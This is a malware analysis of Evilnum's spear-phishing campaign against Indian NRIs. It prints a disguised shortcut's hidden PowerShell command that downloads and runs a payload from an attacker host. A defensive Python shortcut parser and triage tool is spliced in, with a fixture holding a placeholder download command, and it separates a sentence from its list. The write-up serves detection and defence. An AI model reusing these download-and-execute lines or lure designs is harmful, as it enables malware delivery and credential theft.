The Evilnum group targets Indian NRIs with spear-phishing emails that claim to carry a document on income tax rules but instead deliver information-stealing malware. The main goal is to spy on HNIs, steal credentials, and gain access to valuable financial information. The stolen information is usually sold to other criminals on underground forums.
The attack typically starts with a spear-phishing email containing a link to a ZIP archive. The archive holds a maliciously crafted Windows shortcut (LNK) file disguised as “Income tax new rules for NRI.pdf.lnk”.
Lnk File: Income tax new rules for NRI.pdf.lnk
Link Flags: HAS SHELLIDLIST | POINTS TO FILE/DIR | NO DESCRIPTION | HAS RELATIVE PATH STRING | HAS WORKING DIRECTORY | HAS CMD LINE ARGS | HAS CUSTOM ICON
File Attributes: ARCHIVE
Create Time: 2019-03-19 10:16:56.805162
Access Time: 2019-03-19 10:16:56.805162
Modified Time: 2019-03-19 10:16:56.805162
Target length: 451584
Icon Index: 0
Target is on local volume
Volume Type: Fixed (Hard Disk)
Volume Serial: 26da47ae
Base Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(App Path:) Remaining Path:
Relative Path: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Working Dir: %SystemRoot%\system32\
Command Line Args: -w hidden -nop -ep bypass -c "IEX(New-Object System.Net.WebClient).DownloadFile('https://ccdn.microsoftdocs.workers.dev/_uploads/Income tax new rules for NRI.pdf','%userprofile%\Downloads\Income tax new rules for NRI.pdf');(New-Object -com Shell.Application).ShellExecute('%userprofile%\Downloads\Income tax new rules for NRI.pdf');IEX(New-Object System.Net.WebClient).DownloadFile('https://ccdn.microsoftdocs.workers.dev/_uploads/event.dat','C:\Users\Public\Music\event.log');IEX(New-Object System.Net.WebClient).DownloadFile('https://ccdn.microsoftdocs.workers.dev/_uploads/conhost.dat','%temp%\conhost.exe');(New-Object -com Shell.Application).ShellExecute('%temp%\conhost.exe');"
Icon filename: .\pdf.pdf
The LNK file carries a PowerShell command line that downloads the malicious binary payload, along with a PDF document, to the victim’s machine.
The binary is downloaded as conhost.exe into the %temp% directory. The downloaded binary is signed with an invalid digital certificate.
The binary holds a list of MAC addresses associated with virtual environments and will not execute its payload if a match is found. The executable code is protected, and the malicious payload runs only after it has been decrypted. Upon execution, the payload sends the following information to the C2 server:
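The shortcut metadata above is exactly what a defender wants to pull out of a suspected lure before anyone clicks it: the target, the working directory, the command line arguments and the borrowed icon. The following is an added example, not code from the original write-up: a small parser for the Shell Link header and StringData fields laid out in the public [MS-SHLLINK] specification, plus a triage function that flags the combination seen here (document-style double extension, PowerShell target, hidden-window and execution-policy-bypass arguments, document icon on an executable). The .lnk blobs it runs on are constructed fixtures built by the same script; the lure-shaped one mirrors the launch pattern from the dump with the download host replaced by a placeholder (example.invalid), and the benign one is an ordinary Notepad shortcut.

```python
"""Triage of Windows shortcut (.lnk) lures: parse the Shell Link header and
StringData, then flag shortcuts that look like documents but launch a script
host with download-and-execute arguments.

Added example; not code from the original write-up. Field layout follows
the public [MS-SHLLINK] specification. The .lnk blobs below are constructed
test fixtures, not the real sample.
"""
import re
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}

# LinkFlags bits ([MS-SHLLINK] 2.1.1), listed in StringData order
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")
SUSPICIOUS_TOKENS = ("-w hidden", "-windowstyle hidden", "-nop", "-ep bypass",
                     "-executionpolicy bypass", "iex", "downloadfile", "downloadstring", "shellexecute")


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, FileAttributes and the StringData fields of a .lnk.

    LinkTargetIDList and LinkInfo are skipped via their own length prefixes;
    the strings (target, arguments, icon) are what an analyst triages first.
    """
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("bad HeaderSize: not a Shell Link file")
    if data[4:20] != LINK_CLSID:
        raise ValueError("bad LinkCLSID: not a Shell Link file")
    flags, attrs = struct.unpack_from("<II", data, 0x14)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize excludes itself
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]      # LinkInfoSize includes itself
    unicode = bool(flags & IS_UNICODE)
    info = {"flags": flags, "file_attributes": attrs}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]     # CountCharacters, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        info[name] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
        pos += nbytes
    return info


def triage_lnk(filename: str, data: bytes) -> list:
    """Return human-readable reasons a shortcut deserves analyst attention."""
    info = parse_lnk(data)
    reasons = []
    name = filename.lower()
    if name.endswith(".lnk") and name[:-4].endswith(DOC_EXTENSIONS):
        reasons.append("document-style double extension: " + filename)
    target = info.get("relative_path", "").lower().rsplit("\\", 1)[-1]
    if target in SCRIPT_HOSTS:
        reasons.append("target is a script host: " + target)
    args = info.get("arguments", "")
    hits = [t for t in SUSPICIOUS_TOKENS if t in args.lower()]
    if hits:
        reasons.append("suspicious arguments: " + ", ".join(hits))
    # Single-quoted literals in the arguments are usually the URLs fetched and
    # the paths written; surface them so they can go straight into blocklists.
    iocs = re.findall(r"'([^']+)'", args)
    if iocs:
        reasons.append("embedded URLs/paths: " + "; ".join(iocs))
    icon = info.get("icon_location", "").lower()
    if target.endswith(".exe") and icon.endswith(DOC_EXTENSIONS):
        reasons.append("icon borrowed from a document type while target is an executable")
    return reasons


def _string_data(s: str) -> bytes:
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_fixture_lnk(relative_path: str, working_dir: str, arguments: str, icon: str) -> bytes:
    """Constructed fixture: header plus Unicode StringData only (no IDList/LinkInfo)."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIH2sII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20,        # FILE_ATTRIBUTE_ARCHIVE, as in the dump above
                         0, 0, 0,     # Creation/Access/Write FILETIMEs (left zero)
                         0, 0, 1,     # FileSize, IconIndex, ShowCommand=SW_SHOWNORMAL
                         0, b"\0\0", 0, 0)
    return header + b"".join(_string_data(s) for s in (relative_path, working_dir, arguments, icon))


# Lure-shaped fixture (constructed): launch pattern from the dump, placeholder host.
LURE_NAME = "Income tax new rules for NRI.pdf.lnk"
LURE_LNK = build_fixture_lnk(
    "..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "%SystemRoot%\\system32\\",
    "-w hidden -nop -ep bypass -c \"IEX(New-Object System.Net.WebClient).DownloadFile("
    "'https://cdn.example.invalid/lure.pdf','%temp%\\lure.pdf')\"",
    ".\\pdf.pdf",
)
# Benign fixture (constructed): an ordinary Notepad shortcut with no arguments.
BENIGN_LNK = build_fixture_lnk("..\\Windows\\System32\\notepad.exe", "%SystemRoot%\\system32\\",
                               "", "%SystemRoot%\\system32\\notepad.exe")

if __name__ == "__main__":
    for reason in triage_lnk(LURE_NAME, LURE_LNK):
        print("-", reason)
    print("benign shortcut reasons:", triage_lnk("notepad.lnk", BENIGN_LNK))
```

Run against a real shortcut with `triage_lnk(path.name, open(path, "rb").read())`. The parser deliberately stops after StringData; the ExtraData blocks that follow (tracker, environment variable and known-folder blocks) can carry further evidence such as the origin machine's NetBIOS name and are worth adding once the basic triage is in place.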
- Machine Name
- Antivirus Installed
- OS Name
- OS Version
- OS installation date
The malware can perform the following malicious functions in response to commands received from the C2 server:
- Screen Capturing
- Downloading additional malware
- Executing commands
In other incidents, Evilnum appears to use maliciously crafted Windows shortcut (LNK) files disguised as scans of credit cards, ID cards, utility bills and other documents to lure victims.